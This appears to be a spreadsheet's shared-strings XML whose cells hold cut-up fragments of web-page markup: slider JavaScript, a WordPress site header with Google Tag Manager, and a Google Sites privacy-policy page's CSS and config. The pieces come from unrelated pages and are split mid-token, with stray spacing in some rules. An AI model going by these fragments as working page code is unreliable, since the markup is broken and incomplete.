						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) &amp;&amp; e.el.length==0)? e.gh : e.el;
						e.gh = Array.isArray(e.gh) ? e.gh :</t>
  </si>
  <si>
    <t>[e.gh];
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];
						var nl = new Array(e.rl.length),
							 ix = 0,
							sl;
						e.tabw = e.tabhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.tabw;
						e.thumbw = e.thumbhide&gt;=pw ? 0 : e.thumbw;
						e.tabh = e.tabhide&gt;=pw ? 0 : e.tabh;
						e.thumbh = e.thumbhide&gt;=pw ? 0 : e.thumbh;
						for (var i in e.rl) nl[i] = e.rl[i]&lt;window.</t>
  </si>
  <si>
    <t>RSIW ? 0 : e.rl[i];
						sl = nl[0];
						for (var i in nl) if (sl&gt;nl[i] &amp;&amp; nl[i]&gt;0) { sl = nl[i]; ix=i;}
						var m = pw&gt;(e.gw[ix]+e.tabw+e.thumbw) ? 1 : (pw-(e.tabw+e.thumbw)) /</t>
  </si>
  <si>
    <t>(e.gw[ix]);
						 newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);
					}
					var el = document.getElementById(e.c);
					if (el!==null &amp;&amp; el) el.style.height</t>
  </si>
  <si>
    <t>important;}		&lt;/style&gt;
		&lt;noscript&gt;&lt;style&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;&lt;/head&gt;
&lt;body class="page-template-default page page-id-35 wp-embed-responsive porto-breadcrumbs-bb full blog-1 wpb-js-composer js-comp-ver-6.10.0 vc_responsive"&gt;
&lt;!-- Google Tag Manager (noscript) --&gt;_x005F_x000D_
&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZZHZKK"_x005F_x000D_
height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager (noscript) --&gt;&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299</t>
  </si>
  <si>
    <t>type="table" tableValues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;feComposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;_x005F_x000D_
	&lt;div class="page-wrapper"&gt;&lt;!-- page wrapper --&gt;_x005F_x000D_
		_x005F_x000D_
								&lt;!-- header wrapper --&gt;_x005F_x000D_
			&lt;div class="header-wrapper"&gt;_x005F_x000D_
								_x005F_x000D_
&lt;header id="header" class="header-builder header-builder-p"&gt;_x005F_x000D_
&lt;div class="porto-block" data-id="53"&gt;&lt;style&gt;.vc_custom_1661451899370{margin-top: 0px !important;margin-bottom: 0px ! important;padding-top: 0px ! important;padding-bottom: 0px !important;}.vc_custom_1661191356072{margin-right: 0px !</t>
  </si>
  <si>
    <t>important;padding-right: 0px ! important;}.vc_custom_1661189978889{margin-bottom: 0px ! important;padding-top: 0px !</t>
  </si>
  <si>
    <t>important;}.vc_custom_1662570658463{margin-top: 0px !important;margin-bottom: 0px !important;}.list-inline {_x005F_x000D_
    padding-left: 0;_x005F_x000D_
    list-style: none;_x005F_x000D_
    margin-left: -5px;_x005F_x000D_
    _x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
ul.list-inline li{_x005F_x000D_
    display:inline;_x005F_x000D_
    padding-left:10px;_x005F_x000D_
    padding-right:10px;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.text-right{_x005F_x000D_
    text-align:right;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.flright{_x000D _
    float:right;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
 .w100{width:100%;}&lt;/style&gt;&lt;div class="container"&gt;&lt;div class="vc_row wpb_row row top-row"&gt;&lt;div class="vc_column_container col-md-12"&gt;&lt;div class="wpb_wrapper vc_column-inner"&gt;&lt;div class="vc_empty_space"   style="height: 20px"&gt;&lt;span class="vc_empty_space_inner"&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="vc_row wpb_row row top-row vc_custom_1661451899370 pb-0 text-right"&gt;&lt;div class="vc_column_container col-md-6 vc_custom_1661191356072"&gt;&lt;div</t>
  </si>
  <si>
    <t>class="wpb_wrapper vc_column-inner"&gt;
	&lt;div class="wpb_text_column wpb_content_element  vc_custom_1661189978889" &gt;
		&lt;div class="wpb_wrapper"&gt;
			&lt;p&gt;&lt;img class="alignnone wp-image-36" src="http://hookedandcompany.com/wp-content/uploads/2022/08/hnc-logo.png" alt="" width="208" height="25" /&gt;&lt;/p&gt;
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="flright vc_column_container col-md-6 text-right"&gt;&lt;div class="wpb_wrapper vc_column-inner"&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&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3bPX8yj-58MEc1I6uMqww4-GOFeGHG6J-mkud8ayC7jhvsdApBzWlYHPibtdOtCDUgCLKw","je":1,"sstu":1681340222598269,"si":"CNTX27W4pf4CFQP3awodXIULMg","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747267,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49823172,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50266220,50291080,50313182,50322323,50347762,50455861,50468101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href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta property="og:title" content="Home"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://sites.google.com/view/dekoaappshotwheelscollector/home"&gt;&lt;meta property="og:description" content="
HotWheels Collector privacy-policy"&gt;&lt;meta itemprop="name" content="Home"&gt;&lt;meta itemprop="description" content="
HotWheels Collector privacy-policy"&gt;&lt;meta itemprop="url" content="https://sites.google.com/view/dekoaappshotwheelscollector/home"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="gePympiNf2NIZZEFQ4Jy_A"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="gePympiNf2NIZZEFQ4Jy_A"&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="gePympiNf2NIZZEFQ4Jy_A"&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;&lt;/script&gt;&lt;title&gt;Home&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="gePympiNf2NIZZEFQ4Jy_A"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.JYVBee .OUGEr{color: rgba(34,110,147,1);}.OmQG5e .OUGEr{color: rgba(33,33,33,1);}.iwQgFb{background-color: rgba(0,0,0,0.150000006);}.ySLm4c{font-family: Lato, sans-serif;}.CbiMKe{background-color: rgba(30,108,147,1);}.qeLZfd .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color: rgba(34,110,147,1);}.qeLZfd .qLrapd{color: rgba(34,110,147,1);}.qeLZfd .JYVBee{color: rgba(34,110,147,1);}.qeLZfd .aHM7ed{color: rgba(34,110,147,1);}.qeLZfd .OmQG5e{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .NHD4Gf{color: rgba(33,33,33,1);}.qeLZfd .aw5Odc{color: rgba(0,101,128,1);}.qeLZfd .dhtgD:hover{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:visited{color: rgba(0,101,128,1);}.qeLZfd .iwQgFb{background-color: rgba(0,0,0,0.150000006);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .duRjpb</t>
  </si>
  <si>
    <t>.OUGEr{color: rgba(34,110,147,1);}.qeLZfd .JYVBee .OUGEr{color: rgba(34,110,147,1);}.qeLZfd .OmQG5e .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd:before{background-color: rgba(242,242,242,1); display: block;}.lQAHbd .zfr3Q{color: rgba(255,255,255,1);}.lQAHbd .qnVSj{color: rgba(255,255,255,1);}.lQAHbd .Glwbz{color: rgba(255,255,255,1);}.lQAHbd .duRjpb{color: rgba(255,255,255,1);}.lQAHbd .qLrapd{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .aw5Odc{color: rgba(255,255,255,1);}.lQAHbd .dhtgD:hover{color: rgba(255,255,255,1);}.lQAHbd .dhtgD:visited{color: rgba(255,255,255,1);}.lQAHbd .iwQgFb{background-color: rgba(255,255,255,0.150000006);}.lQAHbd .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .JYVBee .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .OmQG5e .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(30,108,147,1); display: block;}.cJgDec .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color : rgba(255,255,255,1);}.cJgDec .qnVSj{color: rgba(255,255,255,1);}.cJgDec .Glwbz{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .qLrapd{color: rgba(255,255,255,1);}.cJgDec .aHM7ed{color: rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}.O13XJf .IFuOkc{background-color: rgba(34,110,147,1); background-image: url(https://ssl.gstatic.com/atari/images/simple-header-blended-small.png);}.O13XJf .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.4; display: block;}.O13XJf .zfr3Q{color: rgba(255,255,255,1);}.O13XJf .qnVSj{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .duRjpb{color: rgba(255,255,255,1);}.O13XJf .qLrapd{color: rgba(255,255,255,1);}.O13XJf .JYVBee{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .aHM7ed{color: rgba(255,255,255,1);}.O13XJf .OmQG5e{color: rgba(255,255,255,1);}.O13XJf .NHD4Gf{color: rgba(255,255,255,1);}.tpmmCb .zfr3Q{color: rgba(33,33,33,1);}.tpmmCb .zfr3Q</t>
  </si>
  <si>
    <t>.OUGEr{color : rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.aw5Odc{color: rgba(0,101,128,1);}.dhtgD:hover{color: rgba(0,122,147,1);}.dhtgD:active{color: rgba(0,122,147,1);}.dhtgD:visited{color: rgba(0,101,128,1);}.Zjiec{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 300; letter-spacing: 1px; line-height: 1.3; padding-bottom: 62.5px; padding-left: 48px; padding-right: 36px; padding-top: 11.5px;}.XMyrgf{margin-top: 0px; margin-left: 48px; margin-bottom: 24px; margin-right: 24px;}.TlfmSc{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.Mz8gvb{color: rgba(255,255,255,1);}.zDUgLc{background-color: rgba(33,33,33,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(178,178,178,1);}.YTv4We:hover:before{background-color: rgba(255,255,255,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.eWDljc{background-color: rgba(33,33,33,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(255,255,255,1); opacity: 0.26;}.PsKE7e{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 12pt; font-weight: 300;}.lhZOrc{color: rgba(73,170,212,1);}.hDrhEe:hover{color: rgba(73,170,212,1);}.M9vuGd{color: rgba(73,170,212,1); font-weight: 400;}.jgXgSe:hover{color: rgba(73,170,212,1);}.j10yRb:hover{color: rgba(0,188,212,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.tCHXDc{color: rgba(255,255,255,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.wgxiMe{background-color: rgba(33,33,33,1);}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .jgXgSe:hover{color: rgba(255,255,255,1);}.fOU46b .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color: rgba(255,255,255,0.8700000048);}.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .G8QRnc .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .Mz8gvb.chg4Jd:focus:before{border-color: rgba(0,0,0,0.8000000119); display: block;}.fOU46b .G8QRnc .ZXW7w{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .TlfmSc{color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.KJll8d{background-color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .qV4dIc{color: rgba(0,0,0,0.6399999857);}.fOU46b .G8QRnc .jgXgSe:</t>
  </si>
  <si>
    <t>hover{color: rgba(0,0,0,0.8199999928);}.fOU46b .G8QRnc .M9vuGd{color: rgba(0,0,0,0.8199999928);}.fOU46b .G8QRnc .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.fOU46b .G8QRnc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .usN8rf .Mz8gvb{color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.Mz8gvb.chg4Jd:focus:before{border-color: rgba(0,0,0,0.8000000119); display: block;}.fOU46b .usN8rf .ZXW7w{color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .KJll8d{background-color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.qV4dIc{color: rgba(0,0,0,0.6399999857);}.fOU46b .usN8rf .jgXgSe:hover{color: rgba(0,0,0,0.8199999928);}.fOU46b .usN8rf .M9vuGd{color: rgba(0,0,0,0.8199999928);}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.tCHXDc{color: rgba(0,0,0,0.6399999857);}.fOU46b .usN8rf .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .aCIEDd .qV4dIc{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.fOU46b .aCIEDd .TlfmSc{color: rgba(33,33,33,1);}.fOU46b .aCIEDd</t>
  </si>
  <si>
    <t>.KJll8d{background-color: rgba(33,33,33,1);}.fOU46b .aCIEDd .ZXW7w{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .jgXgSe :</t>
  </si>
  <si>
    <t>hover{color: rgba(33,33,33,1); opacity: 0.82;}.fOU46b .aCIEDd .Mz8gvb{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .tCHXDc{color: rgba(33,33,33,1);}.fOU46b .aCIEDd</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(33,33,33,0.1199999973);}.fOU46b .a3ETed .qV4dIc{color: rgba(255,255,255,1);}.fOU46b .a3ETed</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .a3ETed .ZXW7w{color: rgba(255,255,255,1);}.fOU46b .a3ETed .jgXgSe:hover{color: rgba(255,255,255,1); opacity: 0.82;}.fOU46b .a3ETed .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .a3ETed .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .a3ETed</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,0.8700000048);}}.XeSM4.b2Iqye.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .tCHXDc{color: rgba(0,0,0,0.6399999857);}}.KuNac.b2Iqye.fOU46b .iWs3gf.chg4Jd:</t>
  </si>
  <si>
    <t>focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .zDUgLc{opacity: 0;}.LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.LBrwzc .KJll8d{background-color: rgba(0,0,0,1);}.GBy4H .ZXW7w{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(33,33,33,1); color: rgba(0,188,212,0.6999999881);}.BFDQOb:hover{color: rgba(73,170,212,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(242,242,242,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(30,108,147,1); color: rgba(255,255,255,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 11pt; font-weight: 400; line-height: 1.6667; margin-top: 12px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 34pt; font-weight: 300; letter-spacing: 0.5px; line-height: 1.2; margin-top: 30px;}.Ap4VC{margin-bottom: -30px;}.qLrapd{color: rgba(34,110,147,1);}.JYVBee{color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 400; line-height: 1.4; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(34,110,147,1);}.OmQG5e{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 15pt; font-style: normal; font-weight: 400; line-height: 1.25; margin-top: 16px;}.GV3q8e{margin-bottom: -16px;}.NHD4Gf{color: rgba(33,33,33,1);}.LB7kq .duRjpb{font-size: 64pt; letter-spacing: 2px; line-height: 1; margin-top: 40px;}.LB7kq .JYVBee{font-size: 25pt; font-weight: 300; line-height: 1.1; margin-top: 25px;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 40pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 53pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 19pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .JYVBee{font-size: 22pt;}}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 40px; padding-top: 40px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 30px; padding-top: 30px;}}.SBrW1{height: 520px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 520px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 180px; padding-bottom: 32px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe .duRjpb{color: rgba(34,110,147,1); font-size: 45pt; line-height: 1.1;}.gk8rDe .qLrapd{color: rgba(34,110,147,1);}.gk8rDe .JYVBee{color: rgba(34,110,147,1); font-size: 27pt; line-height: 1.35; margin-top: 15px;}.gk8rDe .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color: rgba(33,33,33,1);}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 30pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.gk8rDe .duRjpb{font-size: 38pt;}}@media only screen and (max-width: 479px){.gk8rDe .JYVBee{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .JYVBee{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width:</t>
  </si>
  <si>
    <t>767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(33,33,33,1); font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 48.5px;}}.TlfmSc{font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.PsKE7e{font-family: Lato, sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.21;}.hDrhEe{padding-bottom: 11.5px; padding-top: 11.5px;}.zDUgLc{opacity: 1;}.QmpIrf{background-color: rgba(30,108,147,1); border-color: rgba(255,255,255,1) ; color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal; line-height: normal;}.KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom: hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color: rgba(255,255,255,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom</t>
  </si>
  <si>
    <t>: hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .KjwKmc:hover{background-color:</t>
  </si>
  <si>
    <t>rgba(30,108,147,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(30,108,147,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: Lato, sans-serif; font-size: 11pt;}.CMArNe{background-color: rgba(242,242,242,1);}.LBrwzc .TlfmSc{color: rgba(0,0,0,0.8000000119);}.LBrwzc .YTv4We{color : rgba(0,0,0,0.6399999857);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(0,0,0,0.6399999857); display: block;}.LBrwzc .Mz8gvb{color:</t>
  </si>
  <si>
    <t>767px){.TMjjoe{font-size: 9pt;}}&lt;/style&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;_at_config = [null,"AIzaSyChg3MFqzdi1P5J-YvEyakkSA1yU7HRcDI","897606708560-a63d8ia0t9dhtpdt4i3djab2m42see7o.apps.googleusercontent.com",null,null,null,null,null,null,null,null,null,null,null,"SITES_%s",null,null,null,null,null,null,null,null,null,["AHKXmL3bPX8yj-58MEc1I6uMqww4-GOFeGHG6J-mkud8ayC7jhvsdApBzWlYHPibtdOtCDUgCLKw",1,"CNTX27W4pf4CFQP3awodXIULMg",1681340222598269,[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747267,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49823172,49824153,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50266220,50291080,50313182,50322323,50347762,50455861,50468101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0,null,"v2beta",null,null,null,null,null,null,4,"https://accounts.google.com/o/oauth2/iframe",null,null,null,null,null,null,"https://1640024388-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https://sites.google.com/view/dekoaappshotwheelscollector/home",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[1681340222609,"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{"enableAnalytics":true,"webPropertyId":"","showDebug":false,"hashedSiteId":"95c8d975adbe27613686c14ec88fe2edab2a29d9fb891f2a14c7ff2826797a8e","normalizedPath":"view/dekoaappshotwheelscollector/home","pageTitle":"Home"};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nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;&lt;/script&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;(function(){/*
 Copyright The Closure Library Authors.
 SPDX-License-Identifier:</t>
  </si>
  <si>
    <t>Apache-2.0
*/
var a=(this||self)._jsa||{};a._cfc=void 0;a._aeh=void 0;}).call(this);
&lt;/script&gt;&lt;script nonce="oJICmBTnGHE3ZMpTqYelqg"&gt;const imageUrl =  null ;
      function bgImgLoaded() {
        if (!globals.headerBgImgLoaded) {
          globals.headerBgImgLoaded = new Date().getTime();
        } else {
          globals.headerBgImgLoaded();
        }
      }
      if (imageUrl) {
        const img = new Image();
        img.src = imageUrl;
        img.onload</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
    &lt;html&gt;
